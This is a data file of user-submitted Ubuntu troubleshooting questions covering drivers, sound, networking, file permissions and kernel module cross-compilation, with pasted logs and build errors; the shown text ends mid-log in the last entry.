439113	newbie wants to know what is a root administrator password ?	i trying to load the driver for the lexmark printer which was downloaded form their site . i get to a point where ubuntu 12.04 asks for the root administrator password . i do n't recall putting one in upon installation . if i did how can i retrieve it again ? but if i did n't then what would it be ?
439116	bash history keyboard shortcut for ! *	in bash , there are some handy operators to repeat parts of the last command : ! ^ expands to the first argument of the previous command , e.g. , $ echo one `` two three '' one two three $ echo ! ^ echo one one ! $ expands to the last argument of the previous command , e.g. , $ echo one `` two three '' one two three $ echo ! $ echo `` two three '' two three ! * expands to all arguments of the previous command , e.g. , $ echo one `` two three '' one two three $ echo ! * echo one `` two three '' one two three ( as far as i understand , these are syntactic sugar for ! ! : ^ , ! ! : $ and ! ! : * respectively , where ! ! is an event designator that expands to the previous command , and ^ , $ and * are word designators , see the bash reference manual or man bash . ) these are often quite handy . but it gets even cooler with keyboard shortcuts : when you hit alt+ . or alt+_ , the last argument of the previous command is inserted in the current command , similarly as if you had written ! $ at that point . it is also possible to hit alt+ctrl+y to insert the first argument of the previous command , as if you had written ! ^ at that point . ( see the gnu readline library or info readline . ) i tend to prefer the keyboard shortcuts over bash 's history operators , because i can see what i 'm inserting before i actually execute the command . however , there does not seem to be a shortcut that enables me to insert all the words of the previous command , i.e. , one that does ! * 's job . at least i could not find it . is there such a shortcut ? if not , is it possible to configure the readline library to add one , and how ?
439119	ecryptfs-mount-private fails silently on ubuntu 12.04.4	i have a remote linux server running ubuntu 12.04.4 , which i had someone restart . afterwards i tried ssh'ing in , and found my files encrypted . strangely this works : sudo ecryptfs-recover-private but this seems to fail silently : ecryptfs-mount-private that command basically does n't seem to say anything . any help would be greatly appreciated because i would like to keep using encryption on my server .
439126	ubuntu 12.0.4 network issues	i changed the operating system of my computer from windows xp to ubuntu 12.04 , 32-bit . everything works great , except for the network . i ca n't detect my home network . the confusing part is , that i can detect and connect to other networks.on my other computer with windows 7 , i can connect to my home network , as well as to the other ones . can anyone help me ? results for cat etc/network/interfaces : auto lo iface lo inet loopback results for lspci -nn | grep -e 0280 : 01:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 )
439133	windows 7 wo n't boot from grub	i intially had windows xp . later i got windows 7 and after that ubuntu 13.04 . then i thought of getting rid of xp part . so i used the diskpart utility and deleted that partition . but when i tried to set windows 7 partition as active , it denied the request . on rebooting , windows 7 could not load . here is the boot info . i am quite a newbie and i am pretty sure i have messed up my lappy . please help ! http : //paste.ubuntu.com/7152643/
439135	hdmi not working	i am running ubuntu 12.04 on a sony vaio . i connect my laptop to my tv via hdmi . it was working just fine until i got a recent update . my computer recognizes that i have another display plugged in but no picture or sound will show on my tv . what can i do ?
439137	wpa2 psk is not connecting	sorry for my english in advance . wps_supplicant can connect with this command : wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.confwpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf but when i try use iwpriv the it show that : no private ioctls iwpriv i am using pcnet32 driver and i think this problem is caused by a driver but when i do driver install then i get this : make -c /lib/modules/3.11.0-15-generic/build m=/rtl8192su-master/r92su config_r92su=m config_r92su_wpc=y extra_cflags= '' -ddebug -dconfig_r92su=m -dconfig_r92su_wpc=y '' /usr/src/linux-headers-3.11.0-15-generic/scripts/gcc-version.sh : line 25 : gcc : command not found /usr/src/linux-headers-3.11.0-15-generic/scripts/gcc-version.sh : line 26 : gcc : command not found make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-15-generic' /usr/src/linux-headers-3.11.0-15-generic/arch/x86/makefile:92 : stack protector enabled but no compiler support make [ 1 ] : gcc : command not found ld /rtl8192su-master/r92su/built-in.o cc [ m ] /rtl8192su-master/r92su/michael.o /bin/sh : 1 : gcc : not found make [ 2 ] : *** [ /rtl8192su-master/r92su/michael.o ] error 127 make [ 1 ] : *** [ _module_/rtl8192su-master/r92su ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-15-generic' make : *** [ all ] error 2 if somebody has any solution , please help me .
439140	how to record x days in a loop with zoneminder ?	i would like to keep a trail of 7 days in zoneminder . therfore i would like to set the record mode to : `` record '' ( to be recording all the time ) . how can i get zoneminder to store no more than 7 days ? thanks !
439142	upgrade 404 not found while upgrading from 13.04 to 13.10	i am trying to upgrade my system from 13.04 to 13.10 ( using the automatic upgrade ) and this is what i am getting : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/dapper-backports/main/source/sources 404 not found [ ip : 91.189.92.201 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/dapper-backports/restricted/source/sources 404 not found [ ip : 91.189.92.201 80 ] , w : failed to fetch ( link ) 404 not found [ ip : 91.189.92.201 80 ] , w : failed to fetch ( link ) 404 not found [ ip : 91.189.92.201 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . the connection is fine . any suggestions on how to upgrade ?
439146	folder auto sync when available	i 'm searching for an application that gives me the possibility to `` sync '' my folders ( documents , photos , movies , desktop and so on ) with my network drive on my synology nas . if i 'm not home/when the network drive is not available ) , the application needs to `` save '' my changes and sync these when i 'm back home ( /when the network drive is available ) . also , when i change something on my notebook and i 'll start my desktop , these files need to begin sync'ed with my desktop . currently i have one desktop and one notebook , both with ubuntu and connected to my nas . after a ton of searching i found some applications , like rsync and unison , but it seems these only sync manually and does n't sync back ( nas > desktop or nas > notebook ) . thanks , wouter0100
439147	i can not use deluge as usual	i use ubuntu 12.04 desktop x64 . i use deluge normally to download torrents but today deluge crashed and then stopped downloading ( error ) the status says : desync.com : error : bad file descriptor
439150	no sound after restart in ubuntu 13.10	after restarting my computer ( the first time in a while ) i no longer had any volume indicator or any output devices in my sound settings , but still had sound . i tried some various things to fix this problem and ended up with no sound at all ! here 's where i am now . i can start pulseaudio manually with pulseaudio -- start then i see the output devices , but still am not getting any sound . i 've tried almost every solution mentioned on this thread : no sound in ubuntu except at log in including sudo alsa force-reload , completely reinstalling pulseaudio and alsa-base , and moving my ~/.pulse directory to ~/.pulse-old so a fresh one could be automatically generated . none of this has helped . here is the output of cat /var/log/syslog | grep alsa : mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) utils.c : could not open configuration file /usr/share/alsa/ucm/hda intel pch/hda intel pch.conf mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) parser.c : error : could not parse configuration for card hda intel pch mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) main.c : error : failed to import hda intel pch use case configuration -2 mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-ucm.c : ucm not available for card hda intel pch mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : failed to set hardware parameters on plug : hw:0 : invalid argument mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) control.c : invalid ctl front:0 mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : unable to attach to mixer front:0 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : successfully attached to mixer 'hw:0' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_hw.c : open '/dev/snd/pcmc0d1c ' failed ( -2 ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device iec958:0 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : failed to set hardware parameters on plug : hw:0 : invalid argument mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) control.c : invalid ctl front:0 mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : unable to attach to mixer front:0 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : successfully attached to mixer 'hw:0' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : failed to set hardware parameters on plug : surround40:0 : invalid argument mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_params.c : slave pcm not usable mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_params.c : slave pcm not usable mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : failed to set hardware parameters on plug : surround41:0 : invalid argument mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_params.c : slave pcm not usable mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_params.c : slave pcm not usable mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : failed to set hardware parameters on plug : surround50:0 : invalid argument mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : failed to set hardware parameters on plug : surround51:0 : invalid argument mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : failed to set hardware parameters on plug : surround71:0 : invalid argument mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_hw.c : open '/dev/snd/pcmc0d1p ' failed ( -2 ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device iec958:0 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm.c : unknown pcm a52:0 mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device a52:0 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm.c : unknown pcm a52:0 mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device a52:0 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm.c : unknown pcm dca:0 mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device dca:0 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) control.c : invalid ctl hdmi:0 mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : unable to attach to mixer hdmi:0 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : successfully attached to mixer 'hw:0' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : failed to set hardware parameters on plug : hdmi:0 : invalid argument mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_hw.c : open '/dev/snd/pcmc0d7p ' failed ( -2 ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device hdmi:0,1 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_hw.c : open '/dev/snd/pcmc0d7p ' failed ( -2 ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device hdmi:0,1 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_hw.c : open '/dev/snd/pcmc0d8p ' failed ( -2 ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device hdmi:0,2 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_hw.c : open '/dev/snd/pcmc0d8p ' failed ( -2 ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device hdmi:0,2 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_hw.c : open '/dev/snd/pcmc0d9p ' failed ( -2 ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device hdmi:0,3 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_hw.c : open '/dev/snd/pcmc0d9p ' failed ( -2 ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device hdmi:0,3 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] module-card-restore.c : restoring port latency offsets for card alsa_card.pci-0000_00_1b.0 . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] card.c : created 0 `` alsa_card.pci-0000_00_1b.0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : successfully attached to mixer 'hw:0' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : trying to disable alsa period wakeups , using timers only mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : alsa period wakeups disabled mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-sink.c : successfully opened device hdmi:0 . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-sink.c : selected mapping 'digital stereo ( hdmi ) ' ( hdmi-stereo ) . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-sink.c : successfully enabled mmap ( ) mode . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-sink.c : successfully enabled timer-based scheduling mode . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) control.c : invalid ctl hdmi:0 mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : unable to attach to mixer hdmi:0 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : successfully attached to mixer 'hw:0' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : created sink 0 `` alsa_output.pci-0000_00_1b.0.hdmi-stereo '' with sample spec s16le 2ch 44100hz and channel map front-left , front-right mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.resolution_bits = `` 16 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : device.api = `` alsa '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.class = `` generic '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.subclass = `` generic-mix '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.name = `` hdmi 0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.id = `` hdmi 0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.subdevice = `` 0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.subdevice_name = `` subdevice # 0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.device = `` 3 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.card = `` 0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.card_name = `` hda intel pch '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.long_card_name = `` hda intel pch at 0xf7e10000 irq 47 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.driver_name = `` snd_hda_intel '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.mixer_name = `` intel pantherpoint hdmi '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] sink.c : alsa.components = `` hda:11068446,15582702,00100000 hda:80862806,15582702,00100000 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : created source 0 `` alsa_output.pci-0000_00_1b.0.hdmi-stereo.monitor '' with sample spec s16le 2ch 44100hz and channel map front-left , front-right mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.card = `` 0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.card_name = `` hda intel pch '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.long_card_name = `` hda intel pch at 0xf7e10000 irq 47 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.driver_name = `` snd_hda_intel '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-sink.c : using 2.0 fragments of size 32768 bytes ( 185.76ms ) , buffer size is 65536 bytes ( 371.52ms ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-sink.c : time scheduling watermark is 20.00ms mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-sink.c : driver does not support hardware volume control , falling back to software volume control . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-sink.c : driver does not support hardware mute control , falling back to software mute control . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ alsa-sink-hdmi 0 ] core-util.c : successfully enabled sched_rr scheduling for thread , with priority 5 . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ alsa-sink-hdmi 0 ] alsa-sink.c : starting playback . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : trying to disable alsa period wakeups , using timers only mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : alsa period wakeups disabled mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : successfully opened device front:0 . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : selected mapping 'analog stereo ' ( analog-stereo ) . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : successfully enabled mmap ( ) mode . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : successfully enabled timer-based scheduling mode . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) control.c : invalid ctl front:0 mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : unable to attach to mixer front:0 : no such file or directory mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : successfully attached to mixer 'hw:0' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : created source 1 `` alsa_input.pci-0000_00_1b.0.analog-stereo '' with sample spec s16le 2ch 44100hz and channel map front-left , front-right mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.resolution_bits = `` 16 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : device.api = `` alsa '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.class = `` generic '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.subclass = `` generic-mix '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.name = `` vt1802 analog '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.id = `` vt1802 analog '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.subdevice = `` 0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.subdevice_name = `` subdevice # 0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.device = `` 0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.card = `` 0 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.card_name = `` hda intel pch '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.long_card_name = `` hda intel pch at 0xf7e10000 irq 47 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.driver_name = `` snd_hda_intel '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.mixer_name = `` intel pantherpoint hdmi '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] source.c : alsa.components = `` hda:11068446,15582702,00100000 hda:80862806,15582702,00100000 '' mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : using 2.0 fragments of size 32768 bytes ( 185.76ms ) , buffer size is 65536 bytes ( 371.52ms ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : time scheduling watermark is 20.00ms mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : successfully enabled deferred volume . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : hardware volume ranges from -16.50 db to 60.75 db . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : fixing base volume to -60.75 db mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : using hardware volume control . hardware db scale supported . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-source.c : using hardware mute control . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ alsa-source-vt1802 analog ] core-util.c : successfully enabled sched_rr scheduling for thread , with priority 5 . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ alsa-source-vt1802 analog ] alsa-source.c : starting capture . mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] card.c : changed profile of card 0 `` alsa_card.pci-0000_00_1b.0 '' to output : hdmi-stereo+input : analog-stereo mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_hw.c : open '/dev/snd/pcmc0d3p ' failed ( -16 ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device hdmi:0 : device or resource busy mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] ( alsa-lib ) pcm_hw.c : open '/dev/snd/pcmc0d0c ' failed ( -16 ) mar 25 15:26:08 peter-gazelle-professional pulseaudio [ 8261 ] : [ pulseaudio ] alsa-util.c : error opening pcm device front:0 : device or resource busy what information can i provide to make it easier to help me ? update : it looks like sound is working in other applications ( like chrome ) when i start pulseaudio manually . still no volume indicator in the top bar and the `` test sound '' button does not work which is why i thought sound was not working at all .
439154	ca n't reconnect via ssh	pretty sure i 'm doing it wrong , but i 'm not at home right now and while using an ssh connection to my computer , my connection closed and i ca n't reconnect . i 'm about 90 % positive that my computer shut off and i want to know if i can turn it on remotely . i 'm running 64-bit saucy on a dell optiplex 970 connected to the internet via wired-to powerline directly to a server , which in turn is connected directly to a firewall . it 's easy to server hop to get to it , but i ca n't connect to it directly . is it at all possible to turn my computer back on using mostly default software ? i do n't have remote vnc or the remote desktop connection enabled for unity .
439165	disabling capslock key in kde	i assigned a kde action to caps-lock key ( so that cap-lock is a hotkey for that ) hoping it will be disabled ( a trick working for other keys ) . but it was not . why this happens and how to find a better way to disable caplock ( something more acceptable than this ) ?
439167	ubuntu fonts are wrong after installing wine and ms `` corefonts ''	i installed wine as well as the `` ms corefonts '' add-on . the fonts inside my windows apps are okay , but the fonts in ubuntu are wrong -- both the monospace font used in forms like the one this post is written in , and also the regular fonts used throughout firefox and elsewhere in ubuntu - they look smudgy and ugly , like a 1990-era version of cleartype . gmail in particular is horrible , especially the font in the compose window . how can i get the regular fonts back ? i 'm running ubuntu 13.10 with stock unity , no custom skin or anything . i 've looked in the `` system settings '' but i do n't see any obvious place that controls fonts . `` universal access '' is turned off , and my display settings are okay ( correct resolution etc. ) . in firefox preferences , in the `` content '' section , the selected `` default font '' is `` serif '' 16 point .
439168	user ca n't ftp to a directory but is part of the group that owns it	i have set www-data as the owner and group on my /var/www directory . the permissions on /var/www are 775 , so the www-data group has write access . user1 is a member of the www-data group . vsftpd is installed and i 'm able to connect to the server through sftp as user1 . i 'm able to download from /var/www but i get a permission error every time i try to upload . what am i missing ?
439173	ca n't copy files from mac osx via afp due to locked volumes	i am trying to copy some files from my laptop ( osx ) to a file share on my ubuntu server . i have connected to the server in finder and i am able to copy from it and execute , delete files on the share . when i try to copy a file to it however i get the following message pop up : 'some files ca n't be processed either because you do n't have permission to modify them , or because they are on a locked volume . ' when i ssh to the server and i view the owner and user of the directory ( same user that i use to connect to the share ) i am trying to copy to it lists the directory ( using ls -l ) as drwxrwxrwx . so it has all of the correct permissions it should need to write to the directories but every time i try i get this message . from my laptop i can copy the same media to usb sticks and other directories on the hard drive so i assume the files are n't locked on the system . do you have any suggestions / explanations as to why this is happening and how i can solve it ?
439176	unable to cross compile hello world device driver for arm	i 've been trying to build a basic hello world device driver on my virtual box installation of ubuntu 13.10 for a development board running an armv5 processor . i know i need to cross compile the driver and i 've set-up my local environment in the following fashion : 1 ) clean install of 13.10 . 2 ) sudo apt-get install gcc-arm-linux-gnueabi 3 ) export path= $ path : /usr/arm-linux-gnueabi/bin 4 ) create my hello.c and makefile hello.c # include < linux/module.h > # include < linux/kernel.h > int init_module ( void ) { printk ( kern_info `` hello erich ! \n '' ) ; return 0 ; } void cleanup_module ( void ) { printk ( kern_info `` goodbye erich.\n '' ) ; } makefile obj-m += hello.o all : make -c /lib/modules/ $ ( shell uname -r ) /build m= $ ( pwd ) modules clean : make -c /lib/modules/ $ ( shell uname -r ) /build m= $ ( pwd ) clean 5 ) to run this for a cross compile i then do : make arch=arm cross_compile=arm-linux-gnueabi- this fails with : make -c /lib/modules/3.11.0-12-generic/build m=/home/erich/dd modules make [ 1 ] : entering directory /usr/src/linux-headers-3.11.0-12-generic' cc [ m ] /home/erich/dd/hello.o in file included from include/linux/types.h:5:0 , from include/linux/list.h:4 , from include/linux/module.h:9 , from /home/erich/dd/hello.c:1 : include/uapi/linux/types.h:4:23 : fatal error : asm/types.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/erich/dd/hello.o ] error 1 make [ 1 ] : *** [ _module_/home/erich/dd ] error 2 make [ 1 ] : leaving directory/usr/src/linux-headers-3.11.0-12-generic' make : * [ all ] error 2 6 ) if i attempt to fix this issue by linking asm-generic to asm in the following fashion : sudo ln -s /usr/src/linux-headers-3.11.0-12-generic/include/uapi/asm-generic /usr/src/linux-headers-3.11.0-12-generic/include/uapi/asm it then fails in the new different fashion : make -c /lib/modules/3.11.0-12-generic/build m=/home/erich/dd modules make [ 1 ] : entering directory /usr/src/linux-headers-3.11.0-12-generic' cc [ m ] /home/erich/dd/hello.o in file included from include/linux/irqflags.h:15:0 , from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/bitops.h:27 , from include/linux/bitops.h:22 , from include/linux/kernel.h:10 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : 